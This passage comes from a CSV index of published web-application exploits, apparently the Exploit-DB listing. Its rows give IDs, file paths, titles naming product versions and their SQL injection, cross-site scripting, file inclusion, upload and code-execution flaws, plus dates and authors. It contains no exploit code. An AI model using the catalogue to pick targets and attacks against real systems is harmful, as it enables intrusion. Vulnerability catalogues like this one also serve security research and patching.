Scripting Vulnerabilities",2006-11-03,AL-garnei,php,webapps, -28905,exploits/php/webapps/28905.txt,"ac4p Mobile - '/cp/index.php?pagenav' Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps, -28906,exploits/php/webapps/28906.txt,"Simplog 0.9.3 - 'BlogID' Multiple SQL Injections",2006-11-03,"Benjamin Moss",php,webapps, -28907,exploits/php/webapps/28907.txt,"Simplog 0.9.3 - 'archive.php?PID' Cross-Site Scripting",2006-11-03,"Benjamin Moss",php,webapps, -28908,exploits/php/webapps/28908.txt,"Advanced Guestbook 2.3.1 - 'admin.php' Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps, -28909,exploits/php/webapps/28909.txt,"IF-CMS - 'index.php' Cross-Site Scripting",2006-11-04,"Benjamin Moss",php,webapps, -28910,exploits/php/webapps/28910.pl,"PHPKit 1.6.1 - 'popup.php' SQL Injection",2006-11-04,x23,php,webapps, -28913,exploits/php/webapps/28913.txt,"@cid Stats 2.3 - 'Install.php3' Remote File Inclusion",2006-11-06,Mahmood_ali,php,webapps, -28914,exploits/php/webapps/28914.txt,"Xoops 2.0.5 - 'NewList.php' Cross-Site Scripting",2006-11-06,CvIr.System,php,webapps, -28917,exploits/php/webapps/28917.txt,"AIOCP 1.3.x - 'cp_forum_view.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps, -28918,exploits/php/webapps/28918.txt,"AIOCP 1.3.x - 'cp_dpage.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps, -28919,exploits/php/webapps/28919.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps, -28920,exploits/php/webapps/28920.txt,"AIOCP 1.3.x - 'cp_users_online.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps, -28921,exploits/php/webapps/28921.txt,"AIOCP 1.3.x - 'cp_links_search.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps, -28922,exploits/php/webapps/28922.txt,"AIOCP 1.3.x - 'load_page' Remote File Inclusion",2006-11-06,"laurent gaffie",php,webapps, -28923,exploits/php/webapps/28923.txt,"AIOCP 1.3.x - 'cp_dpage.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps, -28924,exploits/php/webapps/28924.txt,"AIOCP 1.3.x - 'cp_news.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps, -28925,exploits/php/webapps/28925.txt,"AIOCP 1.3.x - 'cp_forum_view.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps, -28926,exploits/php/webapps/28926.txt,"AIOCP 1.3.x - 'cp_edit_user.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps, -28927,exploits/php/webapps/28927.txt,"AIOCP 1.3.x - 'cp_newsletter.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps, -28928,exploits/php/webapps/28928.txt,"AIOCP 1.3.x - 'cp_links.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps, -28929,exploits/php/webapps/28929.txt,"AIOCP 1.3.x - 'cp_contact_us.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps, -28930,exploits/php/webapps/28930.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps, -28931,exploits/php/webapps/28931.txt,"AIOCP 1.3.x - 'cp_login.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps, -28932,exploits/php/webapps/28932.txt,"AIOCP 1.3.x - 'cp_users_online.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps, -28933,exploits/php/webapps/28933.txt,"AIOCP 1.3.x - 'cp_codice_fiscale.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps, -28934,exploits/php/webapps/28934.txt,"AIOCP 1.3.x - 'cp_links_search.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps, -28935,exploits/php/webapps/28935.txt,"AIOCP 1.3.x - Multiple Vulnerabilities",2006-11-06,"laurent gaffie",php,webapps, -28936,exploits/php/webapps/28936.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps, -28937,exploits/php/webapps/28937.txt,"AIOCP 1.3.x - 'cp_show_page_help.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps, -28938,exploits/php/webapps/28938.txt,"IPManager 2.3 - 'index.php' Cross-Site Scripting",2006-11-07,spaceballyopsolo,php,webapps, -28939,exploits/php/webapps/28939.txt,"Kayako SupportSuite 3.0.32 - 'index.php' Cross-Site Scripting",2006-11-07,Dr.HAiL,php,webapps, -28940,exploits/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 - 'Languages.Lib.php' Local File Inclusion",2006-11-08,ajann,php,webapps, -28941,exploits/asp/webapps/28941.txt,"Immediacy .NET CMS 5.2 - 'Logon.aspx' Cross-Site Scripting",2006-11-08,"Gemma Hughes",asp,webapps, -28942,exploits/php/webapps/28942.txt,"FreeWebShop 2.1/2.2 - 'index.php?page' Traversal Arbitrary File Access",2006-11-08,"laurent gaffie",php,webapps, -28943,exploits/php/webapps/28943.txt,"FreeWebShop 2.1/2.2 - 'index.php?cat' Cross-Site Scripting",2006-11-08,"laurent gaffie",php,webapps, -28944,exploits/php/webapps/28944.txt,"Abarcar Realty Portal 5.1.5/6.0.1 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",php,webapps, -28945,exploits/php/webapps/28945.txt,"PHPMyChat Plus 1.9 - Multiple Local File Inclusions",2006-11-08,ajann,php,webapps, -28946,exploits/php/webapps/28946.txt,"Portix-PHP 0.4.2 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",php,webapps, -28947,exploits/php/webapps/28947.txt,"Speedywiki 2.0/2.1 - Multiple Input Validation Vulnerabilities",2006-11-08,"laurent gaffie",php,webapps, -28949,exploits/php/webapps/28949.txt,"bitweaver 1.x - '/newsletters/edition.php?tk' SQL Injection",2006-11-09,"laurent gaffie",php,webapps, -28950,exploits/php/webapps/28950.txt,"LandShop 0.6.3 - 'ls.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-09,"laurent gaffie",php,webapps, -28951,exploits/php/webapps/28951.txt,"LandShop 0.6.3 - 'ls.php' Multiple SQL Injections",2006-11-09,"laurent gaffie",php,webapps, -28952,exploits/php/webapps/28952.txt,"Omnistar Article Manager - Multiple SQL Injections",2006-11-09,"Benjamin Moss",php,webapps, -28953,exploits/php/webapps/28953.txt,"Bitweaver 1.x - '/blogs/list_blogs.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps, -28954,exploits/php/webapps/28954.txt,"Bitweaver 1.x - '/fisheye/list_galleries.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps, -28956,exploits/php/webapps/28956.txt,"StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading",2013-10-14,spiderboy,php,webapps,80 -28959,exploits/php/webapps/28959.txt,"WordPress Plugin Cart66 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80 -28960,exploits/php/webapps/28960.py,"aMSN 0.98.9 Web App - Multiple Vulnerabilities",2013-10-14,drone,php,webapps,80 -29086,exploits/asp/webapps/29086.txt,"ActiveNews Manager - 'articleId' SQL Injection (1)",2006-11-18,"laurent gaffie",asp,webapps, -28963,exploits/php/webapps/28963.txt,"Bitweaver 1.x - '/fisheye/index.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps, -28964,exploits/php/webapps/28964.txt,"Bitweaver 1.x - '/wiki/orphan_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps, -28965,exploits/php/webapps/28965.txt,"Bitweaver 1.x - '/wiki/list_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps, -28967,exploits/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,php,webapps, -28970,exploits/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80 -28971,exploits/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,php,webapps,80 -28972,exploits/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",unix,webapps, -28975,exploits/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps, -28976,exploits/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - Local File Inclusion",2013-10-15,Vulnerability-Lab,ios,webapps, -28977,exploits/ios/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps, -28978,exploits/ios/webapps/28978.txt,"Apple iOS 7.0.2 - Sim Lock Screen Display Bypass",2013-10-15,Vulnerability-Lab,ios,webapps, -28979,exploits/linux/webapps/28979.txt,"DornCMS Application 1.4 - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,linux,webapps, -28980,exploits/php/webapps/28980.txt,"WordPress 2.0.5 - 'functions.php' Remote File Inclusion",2006-11-11,_ANtrAX_,php,webapps, -28982,exploits/php/webapps/28982.txt,"cPanel 10 - 'seldir.html?dir' Cross-Site Scripting",2006-11-13,"Aria-Security Team",php,webapps, -28983,exploits/php/webapps/28983.txt,"cPanel 10 - 'newuser.html' Multiple Cross-Site Scripting Vulnerabilities",2006-11-13,"Aria-Security Team",php,webapps, -28985,exploits/asp/webapps/28985.txt,"20/20 Real Estate 3.2 - 'listings.asp' SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps, -28986,exploits/asp/webapps/28986.asp,"ASP Portal 2.0/3.x/4.0 - 'Default1.asp' SQL Injection",2006-11-13,ajann,asp,webapps, -28988,exploits/php/webapps/28988.txt,"Roundcube Webmail 0.1 - 'index.php' Cross-Site Scripting",2006-11-13,RSnake,php,webapps, -28989,exploits/asp/webapps/28989.txt,"INFINICART - 'search.asp?search' Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps, -28990,exploits/asp/webapps/28990.txt,"INFINICART - 'sendpassword.asp?email' Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps, -28991,exploits/asp/webapps/28991.txt,"INFINICART - 'login.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-13,"laurent gaffie",asp,webapps, -28992,exploits/asp/webapps/28992.txt,"INFINICART - 'browse_group.asp?groupid' SQL Injection",2006-11-13,"laurent gaffie",asp,webapps, -40373,exploits/cgi/webapps/40373.sh,"ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 -28993,exploits/asp/webapps/28993.txt,"INFINICART - 'added_to_cart.asp?ProductID' SQL Injection",2006-11-13,"laurent gaffie",asp,webapps, -28994,exploits/asp/webapps/28994.txt,"INFINICART - 'browsesubcat.asp' Multiple SQL Injections",2006-11-13,"laurent gaffie",asp,webapps, -28995,exploits/php/webapps/28995.txt,"WebTester 5.x - Multiple Vulnerabilities",2013-10-16,X-Cisadane,php,webapps,80 -29151,exploits/asp/webapps/29151.txt,"Link Exchange Lite 1.0 - Multiple SQL Injections",2006-11-21,"laurent gaffie",asp,webapps, -29152,exploits/asp/webapps/29152.txt,"JiRos Link Manager 1.0 - 'openlink.asp?LinkID' SQL Injection",2006-11-21,"laurent gaffie",asp,webapps, -29153,exploits/asp/webapps/29153.txt,"JiRos Link Manager 1.0 - 'viewlinks.asp?categoryId' SQL Injection",2006-11-21,"laurent gaffie",asp,webapps, -29154,exploits/asp/webapps/29154.txt,"CreaDirectory 1.2 - 'search.asp?category' SQL Injection",2006-11-21,"laurent gaffie",asp,webapps, -29155,exploits/asp/webapps/29155.txt,"CreaDirectory 1.2 - 'addlisting.asp?cat' Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps, -28998,exploits/php/webapps/28998.txt,"PHPdebug 1.1 - 'Debug_test.php' Remote File Inclusion",2006-11-12,Firewall,php,webapps, -28999,exploits/php/webapps/28999.txt,"DirectAdmin 1.28/1.29 - 'CMD_SHOW_RESELLER' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps, -29000,exploits/php/webapps/29000.txt,"DirectAdmin 1.28/1.29 - 'CMD_SHOW_USER' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps, -29001,exploits/php/webapps/29001.txt,"DirectAdmin 1.28/1.29 - 'CMD_TICKET_CREATE' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps, -29002,exploits/php/webapps/29002.txt,"DirectAdmin 1.28/1.29 - 'CMD_EMAIL_FORWARDER_MODIFY' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps, -29003,exploits/php/webapps/29003.txt,"DirectAdmin 1.28/1.29 - 'CMD_TICKET' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps, -29004,exploits/php/webapps/29004.txt,"DirectAdmin 1.28/1.29 - 'CMD_EMAIL_VACATION_MODIFY' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps, -29005,exploits/php/webapps/29005.txt,"DirectAdmin 1.28/1.29 - 'CMD_EMAIL_LIST' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps, -29006,exploits/php/webapps/29006.txt,"DirectAdmin 1.28/1.29 - 'CMD_FTP_SHOW' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps, -29008,exploits/asp/webapps/29008.txt,"FunkyASP Glossary 1.0 - 'Glossary.asp' SQL Injection",2006-11-14,saps.audit,asp,webapps, -29009,exploits/asp/webapps/29009.txt,"SitesOutlet eCommerce Kit - Multiple SQL Injections",2006-11-15,"laurent gaffie",asp,webapps, -29010,exploits/asp/webapps/29010.txt,"SiteXpress E-Commerce System - 'Dept.asp' SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps, -29011,exploits/asp/webapps/29011.txt,"ASPIntranet 2.1 - 'default.asp' SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps, -29012,exploits/asp/webapps/29012.txt,"DMXReady Site Engine Manager 1.0 - 'index.asp' SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps, -29013,exploits/asp/webapps/29013.txt,"Pilot Cart 7.2 - 'Pilot.asp' SQL Injection",2006-11-14,"laurent gaffie",asp,webapps, -29014,exploits/asp/webapps/29014.txt,"Car Site Manager - '/csm/asp/listings.asp' Multiple SQL Injections",2006-11-14,"laurent gaffie",asp,webapps, -29015,exploits/asp/webapps/29015.txt,"Car Site Manager - '/csm/asp/detail.asp?p' SQL Injection",2006-11-14,"laurent gaffie",asp,webapps, -29016,exploits/asp/webapps/29016.txt,"Car Site Manager - '/csm/asp/listings.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps, -29017,exploits/php/webapps/29017.txt,"Plesk 7.5/8.0 - 'get_password.php' Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps, -29018,exploits/php/webapps/29018.txt,"Plesk 7.5/8.0 - 'login_up.php3' Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps, -29019,exploits/php/webapps/29019.txt,"Zikula CMS 1.3.5 - Multiple Vulnerabilities",2013-10-17,Vulnerability-Lab,php,webapps, -29020,exploits/php/webapps/29020.txt,"WordPress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting",2013-10-17,Zy0d0x,php,webapps,80 -29021,exploits/php/webapps/29021.txt,"WordPress Plugin Realty - Blind SQL Injection",2013-10-17,Napsterakos,php,webapps,80 -29023,exploits/php/webapps/29023.txt,"Woltlab Burning Board Regenbogenwiese 2007 Addon - SQL Injection",2013-10-17,"Easy Laster",php,webapps, -29024,exploits/asp/webapps/29024.txt,"Inventory Manager - Multiple Input Validation Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps, -29025,exploits/asp/webapps/29025.txt,"Evolve Merchant - 'viewcart.asp' SQL Injection",2006-11-14,"laurent gaffie",asp,webapps, -29026,exploits/php/webapps/29026.txt,"Mega Mall - 'product_review.php' Multiple SQL Injections",2006-11-14,"laurent gaffie",php,webapps, -29027,exploits/php/webapps/29027.txt,"Mega Mall - 'order-track.php?orderNo' SQL Injection",2006-11-14,"laurent gaffie",php,webapps, -29028,exploits/asp/webapps/29028.txt,"MGinternet Property Site Manager - 'listings.asp?s' Cross-Site Scripting",2006-11-14,"laurent gaffie",asp,webapps, -29029,exploits/asp/webapps/29029.txt,"MGinternet Property Site Manager - 'detail.asp?p' SQL Injection",2006-11-14,"laurent gaffie",asp,webapps, -29030,exploits/asp/webapps/29030.txt,"MGinternet Property Site Manager - 'listings.asp' Multiple SQL Injections",2006-11-14,"laurent gaffie",asp,webapps, -29031,exploits/asp/webapps/29031.txt,"MGinternet Property Site Manager - 'admin_login.asp' Multiple SQL Injections",2006-11-14,"laurent gaffie",asp,webapps, -29034,exploits/multiple/webapps/29034.txt,"Elite Graphix ElitCMS 1.01 / PRO - Multiple Web Vulnerabilities",2013-10-18,Vulnerability-Lab,multiple,webapps, -29037,exploits/asp/webapps/29037.txt,"CandyPress Store 3.5.2 14 - 'openPolicy.asp?policy' SQL Injection",2006-11-15,"laurent gaffie",asp,webapps, -29038,exploits/asp/webapps/29038.txt,"CandyPress Store 3.5.2 14 - 'prodList.asp?brand' SQL Injection",2006-11-15,"laurent gaffie",asp,webapps, -29040,exploits/asp/webapps/29040.txt,"High Performance Computers Solutions Shopping Cart - Multiple SQL Injections",2006-11-14,"laurent gaffie",asp,webapps, -29041,exploits/asp/webapps/29041.txt,"Yetihost Helm 3.2.10 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-15,"Aria-Security Team",asp,webapps, -29042,exploits/asp/webapps/29042.txt,"Dragon Internet Events Listing 2.0.01 - 'venue_detail.asp?VenueID' SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps, -29043,exploits/asp/webapps/29043.txt,"Dragon Internet Events Listing 2.0.01 - 'event_searchdetail.asp?ID' SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps, -29044,exploits/asp/webapps/29044.txt,"Dragon Internet Events Listing 2.0.01 - 'admin_login.asp' Multiple Field SQL Injections",2006-11-15,"Benjamin Moss",asp,webapps, -29046,exploits/asp/webapps/29046.txt,"ASPIntranet 2.1 - Multiple SQL Injections",2006-11-15,"Aria-Security Team",asp,webapps, -29047,exploits/php/webapps/29047.txt,"Hot Links - Perl PHP Information Disclosure",2006-11-15,hack2prison,php,webapps, -29048,exploits/asp/webapps/29048.txt,"i-Gallery 3.4 - 'igallery.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,"Aria-Security Team",asp,webapps, -29049,exploits/php/webapps/29049.txt,"BlogTorrent Preview 0.92 - 'Announce.php' Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps, -29050,exploits/php/webapps/29050.txt,"Odysseus Blog 1.0 - 'blog.php' Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps, -29051,exploits/php/webapps/29051.txt,"Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,the_Edit0r,php,webapps, -41035,exploits/php/webapps/41035.txt,"Airbnb Clone Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps, -29053,exploits/asp/webapps/29053.txt,"Image Gallery with Access Database - 'dispimage.asp?id' SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps, -29054,exploits/asp/webapps/29054.txt,"Image Gallery with Access Database - 'default.asp' Multiple SQL Injections",2006-11-16,"Aria-Security Team",asp,webapps, -29058,exploits/php/webapps/29058.txt,"phpMyAdmin 2.x - 'db_create.php?db' Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps, -29059,exploits/php/webapps/29059.txt,"phpMyAdmin 2.x - 'db_operations.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"laurent gaffie",php,webapps, -29060,exploits/php/webapps/29060.txt,"phpMyAdmin 2.x - 'querywindow.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"laurent gaffie",php,webapps, -29061,exploits/php/webapps/29061.txt,"phpMyAdmin 2.x - 'sql.php?pos' Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps, -29062,exploits/php/webapps/29062.txt,"phpMyAdmin 2.x - Multiple Script Array Handling Full Path Disclosures",2006-09-15,"laurent gaffie",php,webapps, -29063,exploits/asp/webapps/29063.txt,"Xtreme ASP Photo Gallery 2.0 - 'displaypic.asp?sortorder' SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps, -29064,exploits/asp/webapps/29064.txt,"Xtreme ASP Photo Gallery 2.0 - 'displaypic.asp?catname' Cross-Site Scripting",2006-11-16,"Aria-Security Team",asp,webapps, -29065,exploits/php/webapps/29065.txt,"WHMCompleteSolution (WHMCS) 5.2.8 - SQL Injection",2013-10-19,g00n,php,webapps, -29150,exploits/php/webapps/29150.txt,"WordPress Theme SAICO 1.0 < 1.0.2 - Arbitrary File Upload",2013-10-24,"Byakuya Kouta",php,webapps, -29221,exploits/cgi/webapps/29221.txt,"BlueSocket BSC 2100 5.0/5.1 - Admin.pl Cross-Site Scripting",2006-12-04,"Jesus Olmos Gonzalez",cgi,webapps, -29222,exploits/php/webapps/29222.txt,"Cerberus Helpdesk 2.x - 'Spellwin.php' Cross-Site Scripting",2006-12-04,"En Douli",php,webapps, -29068,exploits/php/webapps/29068.txt,"WordPress Theme Area53 - Arbitrary File Upload",2013-10-19,"Byakuya Kouta",php,webapps,80 -29071,exploits/php/webapps/29071.txt,"cPanel 10 - DNSlook.HTML Cross-Site Scripting",2006-11-17,"Aria-Security Team",php,webapps, -29072,exploits/php/webapps/29072.txt,"PHP Upload Tool 1.0 - Arbitrary File Upload / Directory Traversal",2006-11-17,"Craig Heffner",php,webapps, -29073,exploits/asp/webapps/29073.txt,"ASPCart 4.5 - Multiple SQL Injections",2006-11-17,"laurent gaffie",asp,webapps, -29074,exploits/asp/webapps/29074.txt,"20/20 Real Estate 3.2 - Multiple SQL Injections",2006-11-17,"laurent gaffie",asp,webapps, -29075,exploits/asp/webapps/29075.txt,"20/20 Auto Gallery 3.2 - Multiple SQL Injections",2006-11-17,"laurent gaffie",asp,webapps, -29077,exploits/asp/webapps/29077.txt,"20/20 Applications Data Shed 1.0 - 'f-email.asp?itemID' SQL Injection",2006-11-17,"laurent gaffie",asp,webapps, -29078,exploits/asp/webapps/29078.txt,"20/20 Applications Data Shed 1.0 - 'listings.asp' Multiple SQL Injections",2006-11-17,"laurent gaffie",asp,webapps, -29079,exploits/php/webapps/29079.txt,"vBulletin 3.6.x - Admin Control Panel Multiple Cross-Site Scripting Vulnerabilities",2006-11-17,insanity,php,webapps, -29080,exploits/asp/webapps/29080.txt,"BestWebApp Dating Site Login Component - Multiple Field SQL Injections",2006-11-17,"laurent gaffie",asp,webapps, -29081,exploits/asp/webapps/29081.txt,"BestWebApp Dating Site - 'login_form.asp?msg' Cross-Site Scripting",2006-11-17,"laurent gaffie",asp,webapps, -29085,exploits/asp/webapps/29085.txt,"Alan Ward A-CART 2.0 - 'category.asp?catcode' SQL Injection (1)",2006-11-18,"laurent gaffie",asp,webapps, -29084,exploits/asp/webapps/29084.txt,"A-Cart Pro 2.0 - 'product.asp?ProductID' SQL Injection",2006-11-18,"laurent gaffie",asp,webapps, -29087,exploits/asp/webapps/29087.txt,"ActiveNews Manager - 'page' SQL Injection",2006-11-18,"laurent gaffie",asp,webapps, -29088,exploits/asp/webapps/29088.txt,"ActiveNews Manager - 'query' Cross-Site Scripting",2006-11-18,"laurent gaffie",asp,webapps, -29089,exploits/asp/webapps/29089.txt,"Active News Manager - 'catID' SQL Injection",2006-11-18,"laurent gaffie",asp,webapps, -29090,exploits/asp/webapps/29090.txt,"ActiveNews Manager - 'articleId' SQL Injection (2)",2006-11-18,"laurent gaffie",asp,webapps, -29091,exploits/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution",2013-10-20,"Halim Cruzito",php,webapps, -29156,exploits/asp/webapps/29156.txt,"CreaDirectory 1.2 - 'search.asp?search' Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps, -29211,exploits/php/webapps/29211.txt,"WordPress Theme Curvo - Cross-Site Request Forgery / Arbitrary File Upload",2013-10-26,"Byakuya Kouta",php,webapps, -29118,exploits/asp/webapps/29118.txt,"Enthrallweb eClassifieds - 'ad.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps, -29093,exploits/asp/webapps/29093.txt,"Texas Rankem - 'selPlayer' SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps, -29094,exploits/asp/webapps/29094.txt,"Texas Rankem - 'tournament_id' SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps, -29095,exploits/php/webapps/29095.txt,"Blog:CMS 4.1.3 - 'list.php' Cross-Site Scripting",2006-11-18,Katatafish,php,webapps, -40372,exploits/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12 / CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 -29097,exploits/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps, -29098,exploits/php/webapps/29098.txt,"BirdBlog 1.4 - '/admin/admincore.php?msg' Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps, -29099,exploits/php/webapps/29099.txt,"BirdBlog 1.4 - '/admin/comments.php?month' Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps, -29100,exploits/php/webapps/29100.txt,"BirdBlog 1.4 - '/admin/entries.php?month' Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps, -29101,exploits/php/webapps/29101.txt,"BirdBlog 1.4 - '/admin/logs.php?page' Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps, -29103,exploits/asp/webapps/29103.txt,"vSpin Classified System 2004 - 'cat.asp?cat' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps, -29104,exploits/asp/webapps/29104.txt,"vSpin Classified System 2004 - 'search.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps, -29105,exploits/asp/webapps/29105.txt,"vSpin Classified System 2004 - 'cat.asp?catname' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps, -29106,exploits/asp/webapps/29106.txt,"vSpin Classified System 2004 - 'search.asp?minprice' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps, -29107,exploits/asp/webapps/29107.txt,"Grandora Rialto 1.6 - '/admin/default.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps, -29108,exploits/asp/webapps/29108.txt,"Grandora Rialto 1.6 - 'listfull.asp?ID' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps, -29109,exploits/asp/webapps/29109.txt,"Grandora Rialto 1.6 - 'listmain.asp?cat' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps, -29110,exploits/asp/webapps/29110.txt,"Grandora Rialto 1.6 - 'printmain.asp?ID' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps, -29111,exploits/asp/webapps/29111.txt,"Grandora Rialto 1.6 - 'searchkey.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps, -29112,exploits/asp/webapps/29112.txt,"Grandora Rialto 1.6 - 'searchmain.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps, -29113,exploits/asp/webapps/29113.txt,"Grandora Rialto 1.6 - 'searchoption.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps, -29114,exploits/asp/webapps/29114.txt,"Grandora Rialto 1.6 - 'listmain.asp?cat' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps, -29115,exploits/asp/webapps/29115.txt,"Grandora Rialto 1.6 - 'searchkey.asp?Keyword' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps, -29116,exploits/asp/webapps/29116.txt,"Grandora Rialto 1.6 - 'searchmain.asp?cat' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps, -29117,exploits/asp/webapps/29117.txt,"Grandora Rialto 1.6 - 'forminfo.asp?refno' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps, -29119,exploits/asp/webapps/29119.txt,"Enthrallweb eClassifieds - 'dircat.asp?cid' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps, -29120,exploits/asp/webapps/29120.txt,"Enthrallweb eClassifieds - 'dirSub.asp?sid' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps, -29121,exploits/asp/webapps/29121.txt,"Enthrallweb eHomes - 'homeDetail.asp?AD_ID' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps, -29122,exploits/asp/webapps/29122.txt,"Enthrallweb eHomes - 'compareHomes.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps, -29123,exploits/asp/webapps/29123.txt,"Enthrallweb eHomes - 'result.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps, -29124,exploits/asp/webapps/29124.txt,"Enthrallweb eHomes - 'result.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-20,"laurent gaffie",asp,webapps, -29126,exploits/asp/webapps/29126.txt,"Gnews Publisher - Multiple SQL Injections",2006-11-20,"Aria-Security Team",asp,webapps, -29128,exploits/php/webapps/29128.txt,"Vikingboard 0.1.2 - 'admin.php?act' Traversal Arbitrary File Access",2006-11-20,"laurent gaffie",php,webapps, -29131,exploits/hardware/webapps/29131.rb,"ARRIS DG860A - NVRAM Backup Password 